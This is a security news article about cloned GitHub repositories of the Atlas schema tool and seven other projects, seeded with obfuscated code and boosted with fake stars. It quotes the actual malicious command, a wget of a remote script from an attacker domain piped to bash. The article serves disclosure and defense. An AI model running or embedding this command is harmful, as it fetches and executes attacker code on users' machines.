Israeli software engineer Ariel Mashraki raised the alarm on Reddit yesterday about a sophisticated attack targeting his popular open-source project and seven others on GitHub. According to Mashraki, attackers created a convincing clone of his project Atlas, boosted its credibility with fake user stars, and injected malicious code designed to execute on users’ systems.

Stealthy Supply Chain Attack

Atlas, a tool for managing and migrating database schemas using modern DevOps principles, has approximately 4,000 users and enjoys widespread adoption in GoLang solutions. The malicious clones were designed to appear legitimate while secretly containing code that downloads and executes remote scripts on users’ machines.

“It’s hard to detect the full impact,” Mashraki explained in his post. “The attacker obfuscates the code by changing identifiers and scrambling the order of the byte array, so you can’t easily search for it on GitHub. This makes it nearly impossible to track the full impact unless GitHub steps in and helps resolve this issue.”

Mashraki reported the compromised repositories to GitHub support and shared examples of the malicious code with the community. The malicious injection executes the following command on initialization:

wget -O - https://requestbone.fun/storage/de373d0df/a31546bf | /bin/bash &

This command downloads a script from a remote server and executes it with bash privileges in the background, giving attackers potential access to compromised systems.

Multiple Projects Affected

Beyond his own project, Mashraki identified seven additional repositories containing similar malicious code:

Wider Security Implications

This incident highlights the growing sophistication of supply chain attacks targeting open-source software repositories. By creating convincing clones of legitimate projects and artificially enhancing their credibility, attackers exploit the trust developers place in community-vetted code.

The attack on Atlas is particularly concerning given its role in database management, where it potentially has access to sensitive data environments. Organizations using any of these projects should immediately verify their dependencies and check for indicators of compromise.

For the broader developer community, this incident serves as a reminder to verify package sources, inspect code changes during updates, and implement appropriate security measures when incorporating third-party dependencies. It also underscores the responsibility of platform providers like GitHub to develop more robust mechanisms for detecting and preventing such sophisticated impersonation attacks.

As open-source software continues to form the backbone of modern technology infrastructure, securing the software supply chain remains a critical challenge for the entire ecosystem.

Share this post

Author

Editorial Team
Editorial Team
The Editorial Team at Security Land is comprised of experienced professionals dedicated to delivering insightful analysis, breaking news, and expert perspectives on the ever-evolving threat landscape

Comments